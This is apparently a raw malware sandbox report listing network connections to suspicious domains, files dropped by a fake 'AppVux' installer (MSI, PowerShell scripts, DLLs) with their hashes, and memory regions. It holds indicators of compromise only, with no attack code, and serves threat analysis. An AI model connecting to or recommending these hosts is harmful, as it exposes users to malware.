| US | 8.8.8.8:53 | 67.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.91.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.8.21.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 79.121.231.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | appslabs.monster | udp |
| US | 104.21.91.188:443 | youradexchange.com | udp |
| US | 104.21.8.108:443 | pubtrky.com | udp |
| US | 104.21.94.236:443 | appslabs.monster | tcp |
| US | 104.21.94.236:443 | appslabs.monster | tcp |
| US | 8.8.8.8:53 | 236.94.21.104.in-addr.arpa | udp |
| US | 104.21.94.236:443 | appslabs.monster | udp |
| US | 8.8.8.8:53 | confidence-x.com | udp |
| US | 172.67.210.218:443 | confidence-x.com | tcp |
| US | 8.8.8.8:53 | 218.210.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| GB | 172.217.169.78:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| GB | 172.217.169.78:443 | drive.google.com | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | blobcomments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | content.googleapis.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | tcp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.213.14:443 | apis.google.com | udp |
| GB | 172.217.169.10:443 | blobcomments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 216.58.201.97:443 | lh3.googleusercontent.com | udp |
| US | 8.8.8.8:53 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| GB | 172.217.16.234:443 | peoplestackwebexperiments-pa.clients6.google.com | tcp |
| GB | 172.217.16.234:443 | peoplestackwebexperiments-pa.clients6.google.com | tcp |
| GB | 172.217.16.234:443 | peoplestackwebexperiments-pa.clients6.google.com | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 104.21.91.188:443 | youradexchange.com | udp |
| US | 172.67.210.218:443 | confidence-x.com | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.180.1:443 | drive.usercontent.google.com | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| GB | 142.250.200.14:443 | play.google.com | udp |
| GB | 216.58.201.106:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 106.201.58.216.in-addr.arpa | udp |
| US | 104.21.8.108:443 | pubtrky.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 216.58.201.110:443 | google.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.14:443 | clients2.google.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | tcp |
| GB | 172.217.169.67:443 | beacons.gvt2.com | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.17.178.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | beacons2.gvt2.com | udp |
| US | 216.239.32.117:443 | beacons2.gvt2.com | tcp |
| US | 216.239.32.117:443 | beacons2.gvt2.com | udp |
| GB | 216.58.201.110:443 | google.com | udp |
| US | 8.8.8.8:53 | 117.32.239.216.in-addr.arpa | udp |
| US | 104.21.8.108:443 | pubtrky.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aprel88.com | udp |
| US | 172.67.153.234:80 | aprel88.com | tcp |
| US | 172.67.153.234:443 | aprel88.com | tcp |
| US | 8.8.8.8:53 | 234.153.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | death1488.com | udp |
| US | 172.67.151.174:80 | death1488.com | tcp |
| US | 8.8.8.8:53 | 174.151.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | the.earth.li | udp |
| GB | 93.93.131.124:443 | the.earth.li | tcp |
| US | 8.8.8.8:53 | 124.131.93.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | good2-led.com | udp |
| US | 104.21.32.201:80 | good2-led.com | tcp |
| US | 104.21.32.201:443 | good2-led.com | tcp |
| US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.32.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t9z.lol | udp |
| US | 172.67.196.42:443 | t9z.lol | tcp |
| US | 8.8.8.8:53 | 42.196.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raur94.com | udp |
| US | 104.21.68.134:80 | raur94.com | tcp |
| US | 104.21.68.134:443 | raur94.com | tcp |
| US | 8.8.8.8:53 | complete-s.monster | udp |
| US | 104.21.46.166:80 | complete-s.monster | tcp |
| US | 104.21.46.166:443 | complete-s.monster | tcp |
| US | 8.8.8.8:53 | 134.68.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1blob.monster | udp |
| US | 172.67.176.222:443 | 1blob.monster | tcp |
| US | 8.8.8.8:53 | 166.46.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.176.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
Files
\??\pipe\crashpad_204_VWGSPUCVPNUGQLYZ
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | ac9a01cb3d330c8ba3d386040858e5ce |
| SHA1 | 41456d64db198baae4e9290eca1193b18ab7c218 |
| SHA256 | 579a8df5be1206410748a7c8b6f35eb9a13701a15bdbce117adbf5e31180430b |
| SHA512 | 38fd939d6944c7235d05bc6bab84a4460bc6d85d02497b78781f2241fb73c34b8e120661aaf3357deab4b1b00e09a7f0551cfc91238d4a2762ae314d24548913 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d2267146101e6224dc641bd933d3132a |
| SHA1 | 7fa4dc87d778515cb8c011327094925f0c25c0e0 |
| SHA256 | 5682b0bc3a3b32e7a7a99b8605aafa62969a5d3759880c3b687207a31b54bdb6 |
| SHA512 | f19d93a349de0906f17b203a04872ba08d031114dc19aa6c5802f2bbd3ba181368ced4767cb57273d6b73636c3244aaa44cf55b64d490aa65690d29db251887c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 63c69c14a148749cfe6d75ef98e2b643 |
| SHA1 | f7e39e653eaa8ce5d15b5fe1125683c9e709791f |
| SHA256 | 7dfd3b846a4ea9c3779e7fc684e3a75cbeda90b5b0885d9ff6d3bc330e396880 |
| SHA512 | c1be64a1a33c899ceecf2ff71f59f4beed54dd787108b7f15da85e48b9c1f8ce45a29419bf967d7035cd11e9a06637b03b461087d4ef43ce0ff3116280af74d8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ec65c1a47dda3ac12522eceae8caa916 |
| SHA1 | caa134cfda2eb7a3cc01e5d7996442d8ea71bd2d |
| SHA256 | b4bd7f7fbca906e525d7e74fa34bb6a8f36f2b19e946a4d0292400e75934af9b |
| SHA512 | bb60d12cf807a189d9cbde9e8131f2f05c657228bf87ab04e32121e2982a32659f0d81a508f81293b9b66cfc64a1543c16053033885c51e01faf81a12eac497a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 881eb75be40a0552d63b2058c14f6b16 |
| SHA1 | 8c60eb21dfcf90a7a037c3d52357d8cfffb711e7 |
| SHA256 | 28597db97f3402cecf057be9cd92c6ee40533c8400acf4ce916209bdd17793b9 |
| SHA512 | 4a3f2d2c1feee6d1bbdc5fe564f49f1a8ecaf8ed92479554396f5a0bdf3d4ebe8084e8f97181daae5e4babe0a3e980cf929f8c25ef064e27d7ef1b2068540018 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a165e125c5e4cc55112b5fd7729247b6 |
| SHA1 | eee844f8ad23dbe233b8b93e51e31ea8ccd234e8 |
| SHA256 | ff8ea74ede9da10a4c413f40ec79dba32ddd2676c2f387d28f677dc2e6522e1a |
| SHA512 | 1f34de7fad42e7ffc6cd28106907d2f30ec8686f3527d1443018eecd0707021202a2218ede67a7ff13f94241f75ba506aa34e4760bfdec4a461e83af67257b28 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001f
| MD5 | 1128652e9d55dcfc30d11ce65dbfc490 |
| SHA1 | c3dc05f00453708162853a9e6083a1362cc0fc26 |
| SHA256 | b189ff1f576a3672b67406791468936b4b5070778957ba3060a7141200231e4e |
| SHA512 | 75e611ba64a983b85b314b145a6d776ed8c786f62126539f6da3c1638bf7e566c11daf18d1811b07656de47ff8b50637520cf719a2cacc77a9d27393fc08453b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 7cee153545c2ab4f12bf5711cc3353b5 |
| SHA1 | f57adc37535d88a524ebc3928efba867c853a6d0 |
| SHA256 | 530a68d15c602ac772cecec9e6963e041374ff5a23487f982155a01e8bc91f71 |
| SHA512 | e8e7cd56c782d72f4197736d55ff915ef5616ccf5975ccc094aec3bda072f46165b48b4da28dbc71ae6ff100d36c08292362802d93b1c3b570916982a2c4e595 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 755f1a800e2fe7075bbadd2f3710818a |
| SHA1 | 522da7c5916502edb5c0af82a8f76473af246953 |
| SHA256 | 640ebb7348e47796c36b8dc7db1cf5cc6b23501f84e681b6919c549d5debc218 |
| SHA512 | 0c8f11b537236de364ee86e24c9373167075e07f6b2bf6e028e6581e74d82b3581c914cd1fb1fed9b265baccd2374fc4b91bb12503f507ad8d4b79682da7661a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 77cf3222eaf69fb7a4d6355a01e71ca8 |
| SHA1 | 0bcee866170a3fd2cc1bf76f056e7235bd97e19b |
| SHA256 | 457c2b440bb17f39185a439d8c97b2b2d147fb11709c022e0859ffb1c650201d |
| SHA512 | 4aa221ef76cac2346426b7fb9eec16b0ee3dd8fc2542ed200ec0068a270abef349be6709aebcbeba24dc6391ed3f12603d08309a7bf7b459d4fb89c42426e3bf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 060c85d594bd655f2eb2489949ca2d4a |
| SHA1 | b85ec0c39d3315dc142ef21d5df009c60c29fb49 |
| SHA256 | c1f10b5c0a7be8a398d24a12261bf6869da2374c0231eb911350459a8bcb644f |
| SHA512 | e28982c883157180507a89c8a1203a7cbd28ea3e7520c7f708cbf89ff4eef9eca851a3442d27d81f6a98b50ced60d6bfc1950b8ed935f1e93693d7e8c70899fb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 85dfc381f25cbe663f36ee67317ac5b8 |
| SHA1 | 44add14bf4576b9a6eaccdc1845de5aea022beda |
| SHA256 | 416ea578d2bab0caf06d6f98c688100a60dd81a702271e0b506315de2a48cd44 |
| SHA512 | c5e4378dd7840192d28dfb25e8ffd2edfe0a91393e5eea73a85e51561180238c8ad207fa7c3a095587cdd34ca89c03aded98281e82af8418349d70b75beaf745 |
C:\Users\Admin\Downloads\your_files.zip.crdownload
| MD5 | c47971b7ded4a1ccc5d1614208913237 |
| SHA1 | d55e7ac02a336ca8d958b3081c0cf8bd1178daef |
| SHA256 | 834c369a06df3985f492150c0efb2be3cb06bb6a8e5d477e54eefd2943e4561a |
| SHA512 | 4ba3b3ab62df88bd72c66e24f87a7461d413a7ffeacb28d16831cc470b45c82853d8e330ece1af910c2b13c739d29d846684e6ca94af22f66b2b084d13cfe26c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 3fb9f8702c7dffbb1af981449f085478 |
| SHA1 | 2c401bf690c6d273b2cf823538fef1a7eb653473 |
| SHA256 | 70b94cb2b20c0e076919c369e89578fc538fd772b6335ec04c0bd27772070017 |
| SHA512 | 238149c46c2db3361320a85092ca67aac2bb2e9d3ff949b868cfe29d2bff53429346211d815afe7d97c4708e00cd1731cb5ce8dece1a9dfc8a92abd2a3e2b80e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e675f40922676892ee415e4e1f124585 |
| SHA1 | 2db1f08b160cdc07b9ad6663b974a58bce2b1cce |
| SHA256 | 9a6b7b66c04b06acb53ed753c239d55bdbae80369f97ddad3b0de33a988fb2b1 |
| SHA512 | 5679183124f345396a122924e8ae576b99832b58600cb260dc9b8d5be2a09d0c46afde0e9c6902263e7e79600bffdf401cfd0913eb46732bb7ede60be963a096 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 8bf247eb4dfaf194e8009ae13a1c6d1a |
| SHA1 | 1e773d7798f6e68b4f1f95adfc1c0cf277e0f303 |
| SHA256 | e703889a9b2728db8fa90dba23314c119dd6bf5e70c759236fd21eae960adb92 |
| SHA512 | 726111586dff1ab81ea60dac42f4835a45247d817bd5d79888b8db5b68be6cd8b28daab2492f1c0a77bfe5f017b68e0b38b7d50b79c66e120f3f42eafa057aa4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe587903.TMP
| MD5 | 1ac3d12ad0ff5da1810123ab795b5b81 |
| SHA1 | c905b7e56c1059782365816fc7c78d9a5f423752 |
| SHA256 | bd427e626c00660141aaf1bca497695e35bb078610d26a4e6237c5bfc170e6d8 |
| SHA512 | 3f5ddae0c6a324aef956910ad90d46f924e9b2707ef6b754db3d2ebf2c220e5e4f63e05cefdf2cb32c0e80711ae7bdf40b504be6d66de63d624cd09932dc72a8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 8d67bf92c3f3cf2b4f07a6a61c4cb9da |
| SHA1 | c2c11d713da7c579b597670b072cfe081e91d474 |
| SHA256 | 8e42f6bb615da38391dc1a37d6b1e7f5969573cb8bb56f3259ad3adb8e90de38 |
| SHA512 | e382bca9b3e2077bb549f862c5339713e4763fb49a8208ebf2a7dcfdb6cd8671b4602d0ff461d58bac58c438513f348884d73d48bee8c55d62202104605677d6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\96f0f519-8520-4de5-a470-fbb300fa2a19.tmp
| MD5 | 8b08c98694da2e25a6a17ed6f172d34e |
| SHA1 | 3cb6dfc2a4a6abd9f7b683a9a5de2dce8bbdd026 |
| SHA256 | a66575e39e190ed43bf9a1798b5b86343322a80311066c7f5b8c982cc2c49fc8 |
| SHA512 | 04be1fbe8938494f9a4adbe5d4b54a738ddeede4ae460f958d1c76d446ff9778460bf503db74994455c9762d22614a07fe87cf9020dc8376a8700957f84969e7 |
memory/1764-333-0x0000012BA92A0000-0x0000012BA92B0000-memory.dmp
memory/1764-337-0x0000012BA9E40000-0x0000012BA9E50000-memory.dmp
memory/1764-344-0x0000012BB2090000-0x0000012BB2091000-memory.dmp
memory/1764-346-0x0000012BB2110000-0x0000012BB2111000-memory.dmp
memory/1764-348-0x0000012BB21A0000-0x0000012BB21A1000-memory.dmp
memory/1764-349-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp
memory/1764-350-0x0000012BB21B0000-0x0000012BB21B1000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\Projects\Projects.json
| MD5 | d89f5fcc780e7611d62f2637556293c6 |
| SHA1 | 991aebc8dbb16aec5b5382ab3bcdc85e8121909e |
| SHA256 | ca7d14d9d69ca16f104fcefb712f278be6b8745b9d332de53ed69cfe20cef5c8 |
| SHA512 | 68e4e517a988db5f44b1287c7fe5364bd2ec1060b729c80c8ede65ea311c3d8516869cef921d2f208c3b2a28485935303f681217909cb798767766149c55ac04 |
memory/1764-365-0x0000012BB21E0000-0x0000012BB21E1000-memory.dmp
memory/1764-364-0x0000012BB21F0000-0x0000012BB21F1000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\LocalState\cloudCommunitySettings.json
| MD5 | 404a3ec24e3ebf45be65e77f75990825 |
| SHA1 | 1e05647cf0a74cedfdeabfa3e8ee33b919780a61 |
| SHA256 | cc45905af3aaa62601a69c748a06a2fa48eca3b28d44d8ec18764a7e8e4c3da2 |
| SHA512 | a55382b72267375821b0a229d3529ed54cef0f295f550d1e95661bafccec606aa1cd72e059d37d78e7d2927ae72e2919941251d233152f5eeb32ffdfc96023e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 2158855ae2e9d4068443e22ecbcac318 |
| SHA1 | edeb032f0d215743ef484da00ddf464cefbbf705 |
| SHA256 | a966a40000014508d6d611fe2df06162f74b2c2c2fe06d0698cdd8ac83e06b7c |
| SHA512 | 692678d2d4054f365f05cccdf7deb0109921fb012d3bfce4583b7d18a30e9d6aa088d2ef05de30e2720d1f70846973d9a1cebbe68dfd3c0ea6288d285fb33882 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\installer.msi
| MD5 | ac4651a8b7ad1aa545649f41adcf55ec |
| SHA1 | b3ad74fb2ba077f5680f5d836b64dba930e76795 |
| SHA256 | 6fd723b2334f2046fa8c2f9b3b8e6a4ad61a50508ec7a575b0ed114bcf975072 |
| SHA512 | a7dc96d802b58501e956458b7718d5d9c3259a9c4b627323e0cb223ce8490e1e1a1d35e6d2baa2a2f24f0e895e1f8bf3aabc3e16cc73f0d17386018629bd6047 |
C:\Users\Admin\AppData\Local\Temp\MSIC5D4.tmp
| MD5 | 5a1f2196056c0a06b79a77ae981c7761 |
| SHA1 | a880ae54395658f129e24732800e207ecd0b5603 |
| SHA256 | 52f41817669af7ac55b1516894ee705245c3148f2997fa0e6617e9cc6353e41e |
| SHA512 | 9afc180ebc10c0ee0d7306f4b7085608a4e69321044d474691587bf7e63f945888781a9fc5e69568d351ac690b0335214bd04bdf5c75fd8a3bd1ec4be5d3475a |
C:\Users\Admin\AppData\Local\Temp\MSIac749.LOG
| MD5 | 623ac6152418a2b069885227ab5a2dc5 |
| SHA1 | ef7f50f03fb17b4121327d1ea985aed098b0d848 |
| SHA256 | cc47c1405b412dfeeaff023c37f90a5244a87dce3fd4bc7e950dec8157852a25 |
| SHA512 | 6596c46ee9599c26fb55cf142c4cbb027ac2dcaa5a65525564ee42d2e9779a5e8f45766c34c5f86d27e11d8629fff011c3a24ccb7f143b100ddb1c796754c96e |
C:\Windows\Installer\MSICB17.tmp
| MD5 | e92be2ea6cbab4b209fdb91999efa600 |
| SHA1 | 3a78425b5d9094945ab20257900da3f05f146465 |
| SHA256 | d5249e4b26c8a396c8d3806e0fd8ba01806520fd546d815cc912e693463c699a |
| SHA512 | 215f81ac83f64eb3706444d4e018a1f25c09f6bb93432097f5262ee32484cfa1362fb43c91ff12be9611342b6151c09a5381a1dca51ae85beb49e4a9d5edee2c |
memory/1964-499-0x0000000070EE0000-0x00000000715CE000-memory.dmp
memory/1964-500-0x00000000073D0000-0x00000000073E0000-memory.dmp
memory/1964-498-0x0000000007350000-0x0000000007386000-memory.dmp
memory/1964-501-0x00000000073D0000-0x00000000073E0000-memory.dmp
memory/1964-502-0x0000000007A10000-0x0000000008038000-memory.dmp
memory/1964-503-0x0000000008080000-0x00000000080A2000-memory.dmp
memory/1964-504-0x0000000008120000-0x0000000008186000-memory.dmp
memory/1964-505-0x0000000008290000-0x00000000082F6000-memory.dmp
memory/1964-506-0x0000000008520000-0x0000000008870000-memory.dmp
memory/1964-507-0x0000000008370000-0x000000000838C000-memory.dmp
memory/1964-508-0x00000000084B0000-0x00000000084FB000-memory.dmp
memory/1964-509-0x0000000008B60000-0x0000000008BD6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1p3ra444.j3i.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Temp\pssCB72.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
memory/1964-525-0x000000000A210000-0x000000000A888000-memory.dmp
memory/1964-526-0x0000000009950000-0x000000000996A000-memory.dmp
memory/1964-531-0x0000000009C50000-0x0000000009CE4000-memory.dmp
memory/1964-532-0x0000000009BF0000-0x0000000009C12000-memory.dmp
memory/1964-533-0x000000000A890000-0x000000000AD8E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scrCB70.ps1
| MD5 | 864314b82d5abb9a763656b69b18d73a |
| SHA1 | 0a19fad1c6170c07815ef63dcea07a82481049c9 |
| SHA256 | 118b6745b9dbeeb7997a6c55c1a9c49bcb5afffe88836df31f98b9b39929eb14 |
| SHA512 | 0e55053f9d1dcbca9f39a07f929973bd9daac3ac9567b2d3778fc07e9241840f12c08dfcc27951472d6a02d1978e01e3ad68cd578f91370a8da45052af592f01 |
memory/1964-535-0x00000000073D0000-0x00000000073E0000-memory.dmp
memory/1964-540-0x000000000AF60000-0x000000000B122000-memory.dmp
memory/1964-541-0x000000000B660000-0x000000000BB8C000-memory.dmp
memory/1964-546-0x0000000070EE0000-0x00000000715CE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msiCB6F.txt
| MD5 | 6157c8432a9fd8ab05fd72c085b9c50d |
| SHA1 | 36d6aadfc543d39fd298a910165c8f9773c8dfcc |
| SHA256 | b2e19fe898c0e44dc05738beed9ddd8d780126188e446cc6ca08c407509ab5e4 |
| SHA512 | f1edc77787966cc88d2b69505fa758e8f78bed2d9d6b65f34d0f49067ffea5b42a6b7612d6810b1727cdbb9fcbb42b459d3d2f9677561e7b4a07834e2d9fdb6f |
C:\Windows\Installer\MSID74D.tmp
| MD5 | 4a3f6a4023abd6bba56534de47d20017 |
| SHA1 | 02dd888e467143e2e35465d73f39cf3e66afad10 |
| SHA256 | a8dfdc283ad8d4dc6f500ddfab564e79dadae075c0d54784b50e1ca548709b30 |
| SHA512 | 580c7918ef90eb0020901bab645b72bcaf945ceb5bd56c2e7847f229b31a961bc4cd4ca9cb2583db480947ca8a0880b5ae4bd26717217abcacc9754352aaba28 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libgpg-error-0.dll
| MD5 | 45d4164d940ee65b4eb2854fca94293f |
| SHA1 | 162b1adf5c261bd4481c6549e5f17fbb1cad96b6 |
| SHA256 | 0a5a9cd5743be10c506036ad7e60d89d035d36dc5aa376d6a3b86cc009ce5094 |
| SHA512 | 4b6b95f65e51c26f07b99d3cf47512a3e3404b21cc92ccd73fccf7e1cba3657c37950ac57b39d1aa1f9fc37727b4058a29a6e4a3b7fecba3dccd089b1da09dce |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libksba-8.dll
| MD5 | 083f7e514d6b982f09f77e21af38b447 |
| SHA1 | 69a69fe6328603f41429ddc67d1973f0f1b26c36 |
| SHA256 | 7df2d8c02d76fdb0ea0d64261fd6a7cbfed0ca9c8f53c13de9da1731261392c0 |
| SHA512 | dff1d23470fa15a724040e883ee8a421d9193fccb29bbdd33090795e9d106bb388a22cfa2ffe83332ab535087ae8a2883f90b991e466a9ec49b2c67142675ff4 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libnpth-0.dll
| MD5 | a75aa079bab1f26fdf69b80f18e951c7 |
| SHA1 | 1f64fc9d9e8500e0e015b3874d55e652d84df799 |
| SHA256 | 8993c86367054b9f9e9ae517fd0025724d809832f8f6a9938a718cda23afb08c |
| SHA512 | 1834ca2e719baddafb6942d6ce7f45bdc14e95bb11fea968a052abaa03df5dc8d2703295fa15ba4c12f5ff14e842c805c1020f77618d6aba31b3127660b54300 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\libsqlite3-0.dll
| MD5 | 0db821923216fdd29f3ef752b67e0683 |
| SHA1 | 4496a5ec7f08167faa3d2db4c225b962ece339c2 |
| SHA256 | 70e479fbbc65ec754a0b6cc031f0e699468a6d4479c327a6f7c0a04cdca6a109 |
| SHA512 | 15c35743c720b313daa65353b594967d90c8e67c69f5dfaf421e127afed0dcb42b09ce186d2359fd2579e9d835006ac3804742ba914062552f1a6e8b51a6dc05 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\gpg-check-pattern.exe
| MD5 | 6ca7632cc5d6007fb6d29e1a8624664e |
| SHA1 | 50400a3fa8ee23a8f6b492fbc92c34e40bec8bbd |
| SHA256 | 124698ea407083fde0664ac4e950ea55f60d880f8ed636a05473a0e92e592dde |
| SHA512 | 62c8de1381115e2d7f787791ab53385b9c112696f2d7163b1c9e014eead13d9550f8f916d614f18ff791c23187ec987fd749e80fc4b376104ae6c1b6b0a0fc37 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-crt-conio-l1-1-0.dll
| MD5 | 031dc390780ac08f498e82a5604ef1eb |
| SHA1 | cf23d59674286d3dc7a3b10cd8689490f583f15f |
| SHA256 | b119adad588ebca7f9c88628010d47d68bf6e7dc6050b7e4b787559f131f5ede |
| SHA512 | 1468ad9e313e184b5c88ffd79a17c7d458d5603722620b500dba06e5b831037cd1dd198c8ce2721c3260ab376582f5791958763910e77aa718449b6622d023c7 |
C:\Users\Admin\AppData\Roaming\vux epx\AppVux 7.2.2\install\AC6AB7A\api-ms-win-core-util-l1-1-0.dll
| MD5 | 735636096b86b761da49ef26a1c7f779 |
| SHA1 | e51ffbddbf63dde1b216dccc753ad810e91abc58 |
| SHA256 | 5eb724c51eecba9ac7b8a53861a1d029bf2e6c62251d00f61ac7e2a5f813aaa3 |
